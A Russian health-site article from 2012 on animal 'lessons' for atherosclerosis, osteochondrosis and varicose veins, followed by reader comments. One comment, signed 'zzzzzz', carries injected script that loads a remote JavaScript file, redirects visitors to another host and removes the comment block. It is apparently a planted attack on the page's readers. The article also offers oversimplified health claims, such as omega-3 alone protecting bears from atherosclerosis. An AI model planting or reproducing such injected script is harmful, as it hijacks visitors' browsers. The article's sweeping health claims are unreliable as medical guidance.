Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чему можно поучиться у жи...  >>  Чему можно поучиться у животных?
 
Обратная связь
 

Чему можно поучиться у животных?

Размер шрифта
16 марта 2012 10:00
  • google_analytics: false
  • Нравится

Почему люди болеют некоторыми болезнями, а животные нет? Может быть, чему-то стоит поучиться у животного мира?

1 

Атеросклероз и медведи

Главной причиной смерти в современном мире людей является атеросклероз.

У медведей не бывает атеросклероза, хотя уровень холестерина в их крови выше. Медведи впадают в спячку, несколько месяцев не двигаются, не сжигают энергию, их сердце сокращается очень редко. Тем не менее, атеросклеротические бляшки в сосудах медведя не образуются.

Объяснить это просто:

  • Медведи не подвержены стрессам.
  • Они не курят.
  • Употребляют много растительной пищи.
  • Часто едят рыбу, богатую омега-3 полиненасыщенными жирными кислотами, которые предотвращают развитие атеросклероза.

Вывод

От атеросклероза, инфаркта и инсульта медведя спасает большое количество омега-3 полиненасыщенных жирных кислот.

Кошки и остеохондроз

Прямоходящие люди все без исключения подвержены остеохондрозу позвоночника.

Остеохондроз позвоночника – заболевание, которое проявляется дегенеративно-дистрофическими изменениями межпозвонковых дисков и суставов позвоночника.

Он развивается из-за того, что при прямохождении позвонки давят один на другой, раздражаются и подвержены постоянным микроударам, которые сопутствуют нам при ходьбе, беге и прыжках. Межпозвонковые диски (прослойки хряща), призванные смягчать эти удары, с возрастом теряют влагу, становятся менее эластичными, истончаются, а потом полностью исчезают. Это приводит к деформации позвонков, а если у человека есть лишний вес, то негативное воздействие на позвоночный столб и суставы усиливается многократно.

1 
На фото, справа налево, показана деформация позвонков и межпозвоночных дисков:
- здоровый межпозвоночный диск;
- диск с выдавленной грыжей;
- истонченный диск между позвонками с краевыми изменениями в виде отколотых краев, так называемым спонделезом;
- исход деформации, когда как такового межпозвонкового диска уже нет, позвонки полностью прилегают друг к другу.

Вывод

Отсутствие лишнего веса сохраняет здоровье суставов и позвоночного столба кошек.

Собаки и варикоз

Современный человек двигается на порядок меньше, чем люди прошлых поколений. Неподвижный образ жизни приводит к варикозному расширению вен.

Высокая двигательная активность предупреждает развитие варикозного расширения вен, в первую очередь, за счет того, что вены находятся рядом с мышцами, которые являются насосом, проталкивающим кровь. Из-за отсутствия мышечного тонуса, вены расслабляются и со временем расширяются. Это происходит так: створки клапанов в венах, призванные не допускать обратного тока, не смыкаются, кровь постоянно двигается то вверх, то вниз, тем самым все больше расширяя вены. Движение и мышечная активность приводят вены в тонус и предупреждают застой крови в венах.

Вывод

Постоянное движение – причина отсутствия у собак варикозного расширения вен. Повышение двигательной активности спасет людей от болезни вен.


Сюжеты по теме:
Каких болезней у животных нет

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

16 марта 2012 в 12:58

Цитировать   |   Пожаловаться

медведи едят рыбу только тогда, когда она идет на нерест, а это не часто.... Еще они в природе едят много МЯСА! а только растительную пищу - только весной, когда из спячки выходят!

То, чем питаются медведи и разнообразие их рациона напрямую зависит от региона их обитания.. В каждом конкретном районе они могут различаться, но в основном медведи питаются растительной пищей.
Животный корм в летнем рационе играет очень незначительную роль. И, как правило, добывается попутно с кормом растительным. Это могут быть дождевые черви, моллюски, муравьи и другие насекомые, а также грызуны. Отдельные звери могут заинтересоваться и добывать животную пищу, специализируясь на домашней скотине или молодняке диких копытных. Но основная масса медведей предпочитает вегетарианскую еду.
На Дальнем Востоке роль животной пищи для бурых медведей более существенна. Звери собираются к берегам рек во время нереста лососей, интересуются местами, где выбрасываются отходы с рыбокомбинатов.
Именно от качества осеннего корма зависит, насколько удачно пройдет спячка. К основным нажировочным кормам относятся ягоды черники, голубики, брусники, рябины и орешки кедра и кедрового стланика. В южных районах к таким кормам добавляются желуди, орешки бука и каштана, плоды яблони. На Дальнем Востоке медведи осенью кормятся в кедровом стланике и кедровых лесах, отдавая им предпочтение перед изобильными нерестилищами лососей. (Из цикла "Промысловые звери России" Научный рук. С. Черенков. Адаптация и переработка - Дрождина Екатерина.)

Как видите, противоречий с материалами передачи нет. 

3 - zzzzzz

30 июня 2015 в 23:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.